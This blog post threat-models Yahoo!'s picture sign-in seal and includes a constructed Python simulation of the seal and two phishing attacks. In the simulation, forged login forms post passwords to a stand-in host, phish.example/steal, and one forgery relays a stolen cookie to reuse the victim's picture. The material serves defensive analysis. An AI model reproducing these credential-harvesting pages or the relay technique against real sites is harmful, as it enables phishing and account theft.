Picture authentication: threat modeling
In an article colourfully named The Two-Way Peephole, Forbes, a pro-Giuliani business magazine, describes advances in Web security and the new techniques that companies are starting to implement to reduce fraud. The article makes interesting reading.
Here's the part that triggered some research on my side:
The new higher security levels now work in both directions, with you and your bank proving legitimacy to one another. Phishing, the spammer tactic of duping e-mail recipients into logging in to a phony site and then nabbing their personal info, has everyone confused. Phishers sent out a billion and a half e-mails last year, up 19% from 2005, according to Internet security firm Symantec. At Zions Bank, headquartered in Salt Lake City, and at Yahoo, for that matter, customers know they're safely logged in after they've seen a prearranged picture of, say, pansies or Labrador puppies.
I decided to go to Yahoo! and see how the picture is proving Yahoo's legitimacy to me. Here's the initial Yahoo! Mail logon box:
After clicking on Prevent Password Theft, you see the setup page (https://protect.login.yahoo.com/login/set_pref), where you choose the logon box colour and either a text or a picture to display. This is my logon box after I made it orange and gave it a photo of Albion Alley in Melbourne:
This is it. From now on, whenever I log on using my profile on this computer, I will get this custom logon box. That is done with a permanent cookie. The cookie (associated with ) contains cryptic strings like:
When I request the login page from login.yahoo.com, the browser sends the cookie automatically, and the server uses it to locate my picture on the Yahoo! file system. The URL of the Albion Alley image above is https://f5.yahoofs.com/login/9c2abb5871933a60408327cf235208b0/4451177319203bmhsibt31gjv8.gif?loB6HLGBed5FNv9F - it includes some kind of session ID, which is necessary to access the image. Like the login page (https://login.yahoo.com/), the image store is only available over an SSL-encrypted connection.
What can go wrong? Can this login box be forged by a malicious site? Let's do some threat modeling. Below is the list of attacks, with comments on how picture authentication fares against each:
- Traffic interception. Since SSL is required, a non-issue;
- Tampering with the network environment (traffic redirection, DNS poisoning, DNS spoofing and so on). The browser will still send the cookie to whatever it believes is login.yahoo.com, even when that host is the attacker's. A purpose-built, server-side HTML processor is then needed to relay the cookie to the genuine site, extract the login box elements from its response and place them on the malicious page; that is quite complicated, but possible;
- Cross-site scripting (XSS) attack. Cookies are designed to be read only by the site that set them, not by other sites; XSS gets around this restriction. Highly dependent on the browser and the site design, and the attack would also need the HTML processor;
- Password-grabbing trojans. The picture doesn't protect from those;
- User negligence. The mother of all phishing attacks. The redirection attack depends on it (the user ignoring certificate warnings, or the absence of SSL altogether). Some users will happily ignore the fact that the picture has changed or disappeared.
The picture is never shown to a client that doesn't present the cookie, and the cookie only comes into existence when a picture is set up. To misrepresent the server, an attacker has to compromise the client and steal the cookie (or the picture).
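The cookie-gated picture and the relay attack from the list above, as an added worked model (constructed for this post, not Yahoo!'s code). Hostnames, the server secret `SEAL_KEY`, the in-memory stores and all helper names are assumptions; the image bytes are constructed. It shows the two facts the threat model rests on: a client without the cookie never gets the picture, and a tampered or expired image URL is refused, yet a phisher who can get the browser to hand over the cookie (after DNS tampering and an ignored certificate warning) can replay it against the genuine server and reuse the seal.

```python
"""Model of a picture-based sign-in seal and two phishers against it (constructed example)."""
import hashlib
import hmac
import re
import secrets
import time
from typing import Optional
from urllib.parse import parse_qs, urlparse

SEAL_KEY = secrets.token_bytes(32)   # hypothetical server secret for image URL tokens
_seals: dict = {}                    # cookie value -> chosen picture id (server-side store)
_pictures = {"albion-alley": b"GIF89a-constructed-albion-alley-bytes"}   # constructed image


def set_seal(picture_id: str) -> str:
    """Setup page: the user picks a picture; the server files it under a random, opaque cookie."""
    cookie = secrets.token_urlsafe(24)
    _seals[cookie] = picture_id
    return cookie


def image_url(picture_id: str, ttl: int = 300, now: Optional[int] = None) -> str:
    """Short-lived keyed URL for the picture; stands in for the token on the yahoofs URL."""
    exp = (now if now is not None else int(time.time())) + ttl
    tag = hmac.new(SEAL_KEY, f"{picture_id}:{exp}".encode(), hashlib.sha256).hexdigest()
    return f"https://img.example/login/{picture_id}.gif?exp={exp}&t={tag}"


def fetch_image(url: str, now: Optional[int] = None) -> Optional[bytes]:
    """Image store: serve only over https, and only when the token verifies and is unexpired."""
    u = urlparse(url)
    q = parse_qs(u.query)
    m = re.fullmatch(r"/login/([a-z0-9-]+)\.gif", u.path)
    if u.scheme != "https" or not m or "exp" not in q or "t" not in q:
        return None
    picture_id, exp, tag = m.group(1), q["exp"][0], q["t"][0]
    if int(exp) < (now if now is not None else int(time.time())):
        return None                                           # expired token
    expected = hmac.new(SEAL_KEY, f"{picture_id}:{exp}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None                                           # tampered path or token
    return _pictures.get(picture_id)


def login_page(cookie: Optional[str]) -> str:
    """Stand-in for login.yahoo.com: embed the seal only when a known cookie is presented."""
    picture_id = _seals.get(cookie) if cookie else None
    seal = f'<img src="{image_url(picture_id)}">' if picture_id else ""
    return f"<form>{seal}<input name=login><input name=passwd type=password></form>"


def seal_in(html: str) -> Optional[bytes]:
    """What the browser ends up showing: resolve the <img> in a login page, if there is one."""
    m = re.search(r'<img src="([^"]+)">', html)
    return fetch_image(m.group(1)) if m else None


def simplistic_phisher_page() -> str:
    """Attack 1: phish.example never receives the seal cookie (it is scoped to login.yahoo.com),
    so the forged page has no seal to show."""
    return "<form action=https://phish.example/steal><input name=login><input name=passwd></form>"


def relay_phisher_page(cookie_from_victim: str) -> str:
    """Attack 2: DNS tampering puts the attacker where login.yahoo.com should be, the victim clicks
    through the certificate warning, the browser hands over the cookie, and the attacker's
    server-side HTML processor replays it against the genuine site and reuses the seal <img>."""
    genuine = login_page(cookie_from_victim)
    m = re.search(r'<img src="[^"]+">', genuine)
    seal_tag = m.group(0) if m else ""
    return f"<form action=https://phish.example/steal>{seal_tag}<input name=login><input name=passwd></form>"


def demo() -> dict:
    """Run every case from the threat list and report whether the victim sees their picture."""
    cookie = set_seal("albion-alley")
    return {
        "genuine": seal_in(login_page(cookie)) is not None,
        "no_cookie": seal_in(login_page(None)) is not None,
        "forged_cookie": seal_in(login_page("x" * 32)) is not None,
        "simplistic_phisher": seal_in(simplistic_phisher_page()) is not None,
        "relay_phisher": seal_in(relay_phisher_page(cookie)) is not None,
        "tampered_url": fetch_image(image_url("albion-alley").replace("albion-alley.gif", "puppies.gif")) is not None,
        "expired_url": fetch_image(image_url("albion-alley", now=0), now=int(time.time())) is not None,
    }


if __name__ == "__main__":
    for case, shown in demo().items():
        print(f"{case:20s} picture shown: {shown}")
```

Only the genuine page and the relay phisher end up with the picture; everything else gets a bare login box, which is the point of the list above: the cookie is a bearer token, so the attack has to obtain it from the browser rather than guess it or fetch the picture directly, and that takes network tampering plus a user who ignores the certificate warning plus the relay code.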
I was very sceptical about the idea of picture authentication, but apparently Yahoo!'s implementation raises the bar for man-in-the-middle attacks significantly, way above the capabilities of an average stupid phisher. However, it is not clear what percentage of the $13 billion fraud economy (according to Forbes and Javelin Strategy and Research - where do they get those numbers from?) depends on simplistic phishing, and whether technologies like PassMark, which do almost the same as Yahoo!'s (but worse) and cost their customers, the financial institutions, $1 per customer per year, are worth it is anyone's guess. Either way, phishing is doomed.